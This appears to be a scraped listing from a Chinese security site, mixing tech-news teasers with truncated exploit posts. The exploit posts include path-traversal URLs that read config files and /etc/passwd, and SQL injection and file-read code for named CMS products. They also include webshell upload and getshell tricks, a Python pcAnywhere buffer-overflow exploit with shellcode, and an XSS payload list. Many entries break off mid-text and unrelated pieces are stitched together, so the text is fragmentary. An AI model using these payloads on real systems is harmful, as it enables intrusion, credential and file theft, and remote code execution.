漏洞文件在后台的文件管理:other/files.php 读取配置文件 http://www.xxx.com/admin/other/files.php?edit=../../config.inc.php&copt=2 读取linux系统的帐号信息 http://www.xxx.com/admin/other/files.php?edit=../../../../../etc/passwd&copt=2 漏洞证明: 摘自:http://www.9
雅虎公司旗下网站 Yahoo Voice 遭黑客攻击 45.3万用户信息被曝光
据国外媒体TrustedSec报道,雅虎公司旗下网站Yahoo Voice遭黑客攻击,45.3万用户信息被曝光在网上。 被张贴在网上的信息,包括
微软建议Vista/Win7用户禁用桌面小工具 存在安全漏洞 可执行恶意代码
微软日前提醒Windows Vista和Windows 7用户,桌面小工具和侧边栏中存在一个安全漏洞,可能会导致攻击者执行恶意代码,因此建议大家
B2Bbuilder php SQL inj
wap/index.php if (!empty($_GET["action"])) $action=$_GET["action"]; else $action="home"; //$action=empty($action)?"home":$_GET["action"]; //=============================== if(in_array($action, array('home','offer_cat','offer_list','offer_detail','product_cat','product_list','product_detail','news_cat','news_list','news_detail','corporate_cat','corporate_list','corporate_detail','search','corporate_moredetail','product_showimg'))) { require'inc/'.$action.'.php'; } news_cat.php文件 if(!empty($_GET['nid'])) { $nid=$_GET['nid']; $sql="select * from ".NEWSCAT." where pid=$nid"; $db->query($sql); $sre=$db->getRows(); if(count($sre)>0) { foreach($sre as $v) { echo "[资讯]<a href='?action=news_list&newsid=".$v['catid']."'>".$v['cat']."</a>"; } echo " <a href='?act
315爱购程序任意文件源码查看
pic.php function url_base64_decode($code) { if($code=="") return ""; $code=str_replace("!",'+',$code); $code=str_replace(",",'/',$code); $str=base64_decode($code); return $str; } $url=url_base64_decode($_GET["url"]); //....省略 header("Content-type: image/jpeg"); echo file_get_contents($url); exp:http://site/pic.php?url=aW5kZXgucGhw 后台GETSHELL 系统基本参数->网站所在目录:->${ PHPINFO()} 摘自:http
傅盛:360微创新网购敢赔 玩数字游戏毫无诚意
7月12日消息,互联网安全市场战事再起,这次从免费之战上升到了“倒赔”之战。金山网络CEO傅盛昨晚猛烈抨击360抄袭金山的“网购敢赔险”,同
toStaticHTML: The Second Encounter (CVE-2012-1858)
IE toStaticHTML BYPASS HTML Sanitizing Bypass - CVE-2012-1858 Introduction The toStaticHTMLcomponent, which is found in Internet Explorer > 8, SharePoint and Lync is used to sanitize HTML fragments from dynamic and potentially malicious content. If an attacker is able to break the filtering mechanism and pass malicious code through this function, he/she may be able to perform HTML injection based attacks (i.e. XSS). It has been a year since the first
对 zend framework xxe injection 的分析
前几天网上爆出一个zend framework 漏洞 作者:mkods 具体描述如下: https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt ; 根据描述,该漏洞是发生在zend 框架 xmlrpc模块的一个 xxe(XML external entity) injec
石首一80后编写黑客软件 帮网吧逃避实名上网
一边是实施上网实名制的利民举措,一边是只为了牟利,而想方设法让那些未成年人能够上网的网吧。夹在中间的,却是一套为不携带身份证件的网民提供便利
善用网站权限设置 莫让社交变“裸奔” 社交网络诱人沉迷 病态的自恋
在网络畅所欲言的同时,便捷与隐私的矛盾也在逐渐暴露。最初,是不法分子盗取用户资料或恶意发布他人信息,近年来,随着社交网站和产品普及,越来越多
韩寒“叫板”百度背后:维权公司化模式浮出水面
被誉为 “全球最具影响力100人”的80后青年作家,在法庭上挑战中国最大的搜索引擎公司。 7月10日,“韩寒状告百度文库侵权”一案,在北京海淀区
iis6 提权提示 Can not find wmiprvse.exe 的突破方法
如题。 其实很简单就可以突破。 方法一: 在IIS环境下,如果权限做得不严格,我们在aspx大马里面是有权限直接结束wmiprvse.exe进程的
Windows 8.3 命名规则的安全问题
关于最近比较火的Microsoft IIS tilde character “~” Vulnerability/Feature – Short File/Folder Name Disclosure.阅读了几篇外文,算是翻译吧。 文档下载:windows 8.3命名
某CMS系统 上传图片改名、重命名拿WebShell漏洞
打开编辑器,将一句话改名为1.jpg 上传图片, 打开文件管理,进入“down”目录,跳至尾页,最后一个图片既是我们上传
beescms X-Forwarded-For 注射
安全狗是什么?? 版本。BEES_V2.2_R_2012070390 摘自:http://www.90sec.org/viewthread.ph
Symantec pcAnywhere 可登录名和密码字段缓冲区溢出
#!/usr/bin/python # Exploit Title: Symantec PcAnywhere login and password field buffer overflow # Date: 2012.06.27 # Author: S2 Crew [Hungary] # Software Link: symantec.com # Version: 12.5.0 # Tested on: Windows XP SP2 # CVE: CVE-2011-3478 # Code : import socket import time import struct import string import sys shell = ( "\xda\xda\xbb\x9e\x7f\xfb\x04\xd9\x74\x24\xf4\x58\x2b\xc9" "\xb1\x56\x31\x58\x18\x03\x58\x18\x83\xc0\x9a\x9d\x0e\xf8" "\x4a\xe8\xf1\x01\x8a\x8b\x78\xe4\xbb\x99\x1f\x6c\xe9\x2d" "\x6b\x20\x01\xc5\x39\xd1\x92\xab\x95\xd6\x13\x01\xc0\xd9" "\xa4\xa7\xcc\xb6\x66\xa9\xb0\xc4\xba\x09\x88\x06\xcf\x48" "\xcd\x7b\x3f\x18\x86\xf0\xed\x8d\xa3\x45\x2d\xaf\x63\xc2" "\x0d\xd7\x06\x15\xf9\x6d\x08\x46\x51\xf9\x42\x7e\xda\xa5" "\x72\x7f\x0f\xb6\x4f\x36\x24\x0d\x3b\xc9\xec\x5f\xc4\xfb" "\xd0\x0c\xfb\x33\xdd\x4d\x3b\xf3\x3d\x38\x37\x07\xc0\x3b" "\x8c\x75\x1e\xc9\x11\xdd\xd5\x69\xf2\xdf\x3a\xef\x71\xd3" "\xf7\x7b\xdd\xf0\x06\xaf\x55\x0c\x83\x4e\xba\x84\xd7\x74" "\x1e\xcc\x8c\x15\x07\xa8\x63\x29\x57\x14\xdc\x8f\x13\xb7" "\x09\xa9\x79\xd0\xfe\x84\x81\x20\x68\x9e\xf2\x12\x37\x34" "\x9d\x1e\xb0\x92\x5a\x60\xeb\x63\xf4\x9f\x13\x94\xdc\x5b" "\x47\xc4\x76\x4d\xe7\x8f\x86\x72\x32\x1f\xd7\xdc\xec\xe0" "\x87\x9c\x5c\x89\xcd\x12\x83\xa9\xed\xf8\xb2\xed\x23\xd8" "\x97\x99\x41\xde\x06\x06\xcf\x38\x42\xa6\x99\x93\xfa\x04" "\xfe\x2b\x9d\x77\xd4\x07\x36\xe0\x60\x4e\x80\x0f\x71\x44"
重庆酉阳电视台疑在晚间播色情片 官方拒回应
(重庆晨网记者 陈洪岸 7月10日14:40报道) 酉阳电视台资讯频道晚上黄金时间段播放色情片?7月7日晚上,一名网友在酉阳论坛发帖称,当晚酉阳电
Thinksns 2.5 getshell
根目录 thumb.php 看代码 <?php /* * 自动缩略图 参数 url|w|h|type="cut/full"|mark="text/image|r" * thumb.php?url=/thinksns/data/userface/000/00/00/41_middle_face.jpg?1247718988&w=20&h=20 */ error_reporting(0); set_time_limit(30); $biggest_memory_limit = 256; //单位M,后缀不要加M //全局定义文件 //require 'define.inc.php'; //临时目录 $tempDir = "./data/thumb_temp/"; checkDir($tempDir); //分析URL $url = urldecode($_GET['url']); $url =
TEXTCUBE 鸡肋读取文件漏洞
韩国的一个博客程序TEXTCUBE 读了下发现个奇怪的问题 技术有限 希望大家点拨下! \framework\Dispatcher.php (57行) $part = strtok($uri['input'], '/'); // $uri['input']
澳大利亚19名数学家组团赌博赢24亿澳元 数学家组团赌博狂赢24亿澳元
晚报综合报道 澳大利亚19名天才数学家组成了一个名为“庞特俱乐部”的“高智商”赌博集团,利用他们对数学的专业知识,在世界各国的赌场和博彩业疯狂
GHXY国环综合教务管理系统上传漏洞
无意中遇到的,没有别的亮点,就是这上传路径难找点,抓包不到 =========== adminsys\upfile.asp页面直接明小子提交,一次得到up.asp。
xheditor 默认 upload.php 畸形文件上传漏洞
该代码使用白名单机制验证,按道理说白名单一般都是比较安全的。但是问题就出现在验证的过程那里,验证后缀名使用的是正则preg_match方法 只
Xdcms 订餐网站管理系统 代码审计
大家好,我是缘灭 我又来了 今天下午一直在做单子没空看代码。 晚上天气太热又不想回家,呆在办公室无聊,就开始找源码下载来研
HTML5 跨域请求特性导致的 Fackbook Xss
原文是英文的,将大致Xss流程转过来了。 传统情况下 缺陷URL是:http://touch.facebook.com/#profile.php
6000万网民一年被骗300多亿元
网购发展快速,黑客敛财有道。数据显示,过去一年,31.8%的中国网民在网购中直接碰到钓鱼网站或诈骗网站,网购遇骗网民的规模达6169万,其中
硅谷蚁族大不同:黑客旅社吸引创业者入住(图)
导语:7月6日出版的美国《纽约时报》印刷版刊文称,作为全球科技和创业圣地,硅谷吸引了五湖四海的有志青年。但迫于生计,他们只能暂时在狭小的公寓
工信部:业余无线电台不得截取国家安全信息
晨报讯(记者 张璐)为了加强对业余无线电台的管理,维护空中电波秩序,工信部起草了《业余无线电台管理办法(征求意见稿)》,昨日公开征求意见。《办
Linux>=2.6.39 Mempodipper 本地提权分析和 EXP 利用
Linux>=2.6.39 Mempodipper本地提权分析和EXP利用(CVE-2012-0056) /proc/pid/mem是一个用于读取和写入,直接通过各地寻
苹果、谷歌删除应用Find and Call:内藏木马
凤凰科技讯 北京时间7月6日消息,据国外科技博客CNET报道,俄罗斯反病毒软件公司卡巴斯基实验室称,当发现一款名为“Find and
整理了一些 XSS 跨站代码
<!-- " --!><input value="><img src=xx:x onerror=alert(1)//"> <script/onload=alert(1)></script> IE9 <style/onload=alert(1)> alert([0x0D]-->[0x0D]1<!--[0x0D]) 1<!--i document.write('<img src="<iframe/onload=alert(1)>\0">'); IE8 JSON.parse('{"__proto__":["a",1]}') location++ IE valid syntax: 我,啊=1,b=[我,啊],alert(我,啊) alert('aaa\0bbb') IE only show aaa http://jsbin.com/emekog <svg><animation xLI:href="javascript:alert(1)"> based on H5SC#88 #Opera Function('alert(arguments.callee.caller)')() firefox dos? while(1)find(); <div/style=x:expression(alert(URL=1))> Inject <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> enabled css expression,breaking standard mode! <applet